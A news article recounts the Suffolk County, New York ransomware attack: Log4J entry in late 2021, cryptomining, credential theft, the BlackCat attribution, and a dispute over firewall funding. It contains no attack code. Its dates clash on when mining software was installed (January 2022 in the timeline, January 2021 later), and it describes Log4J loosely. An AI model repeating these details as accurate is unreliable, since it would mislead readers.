Suffolk County, New York was hit by a ransomware attack in September 2022 that continues to affect various county services. Read our previous update here.
An investigation has revealed that the attack started in December 2021 when hackers exploited a “Log4J vulnerability” to gain access to the county’s computer network and disable key functions. County Executive Steve Bellone revealed that the hackers demanded a ransom of $2.5 million, which the county decided not to pay.
The attack has so far cost the county $3.4 million for system restoration and $2 million for the forensic investigation with some systems still offline.
The attack has been linked to the IT Director of the county clerk’s office, who had reportedly pushed for increased security before the attack but was denied.
The timeline of the attack is as follows:
- December 19-20, 2021: Hackers gain access to the County Clerk’s Office by leveraging the Log4J vulnerability.
- January 2022: Hackers install bitcoin mining software on clerk office servers to establish a “command and control connection” within the compromised IT environment.
- March: Hackers install remote monitoring and management tools and harvest credentials of officials in the clerk’s office.
- August 18: Hackers attempt to identify members of a highly privileged administrators’ group in county government.
- August 20-21: County systems are compromised via malware run from the clerk’s office. Hackers begin harvesting the credentials of county administrators.
- September 8: County announces hack into computer networks: all websites, servers, networks taken offline.
Log4J is a type of vulnerability that uses remote code execution to drop malware or ransomware into a victim’s system. It can be deeply hidden within software and is often very difficult to detect. Cyber analysts recommend routine deep scans and monitoring to prevent Log4J exploits.
To identify the perpetrators, the county hired digital forensic auditor Palo Alto Networks. The company’s investigation found that the hackers “installed cryptocurrency mining software on multiple servers” in the Suffolk County clerk’s office in January 2021. The hackers “continued to bypass network security and install remote monitoring and management tools as they began harvesting (user credentials of officials)” according to the report. The perpetrators are believed to be the BlackCat (or ALPHV) ransomware hacking group.
According to County Executive Steve Bellone, Republican County Clerk Judith A. Pascale should not have trusted the IT Director of her office, Peter Schlussler, who Bellone believes “seriously misled” her.
Bellone claims that the IT Director had been working independently of the clerk’s office and the clerk’s office “had no eyes on, and no ability to monitor the clerk IT environment.”
Schlussler, however, asserts that “our office attempted to purchase a more robust firewall in June to offer better protection, however that was not allowed to be pushed forward.” Newsday reports that it obtained conflicting documents between the IT Director’s office and the Clerk’s office about what would be stronger IT system protections.
Despite pushback from Pascale’s office for a more expensive solution to identify and prevent cyberattacks, Suffolk County settled for a “virtualized” firewall, which they believed would provide protection while saving taxpayers money. The county’s decision to go with a cheaper option may have contributed to the recent ransomware attack.
Bellone remarked that in Sept 2021 an unauthorized Bitcoin mining operation was discovered which may have caused delays in the $1.4 million dollar cybersecurity upgrade to the Clerk’s office that was approved in Sept 2019.
In 2020, Suffolk County Police Department charged former IT Supervisor, Christopher Naples, with third-degree grand larceny, computer trespassing, public corruption, and official misconduct. He had been running a cryptocurrency operation out of the Riverhead office of the county clerk.
This incident highlights the importance of strong cybersecurity measures to prevent such attacks from occurring and minimize their impact. Suffolk County continues to work with the FBI towards a criminal investigation of the cyberattack. Further comments on the investigation and pending charges were not made.
This attack on Suffolk County, NY serves as a major reminder of the ongoing threat of cyberattacks and the importance of implementing strong cybersecurity measures against potential threats. It is vital for organizations to regularly assess their security protocols and take the necessary steps to ensure their systems are protected before a hacker acts.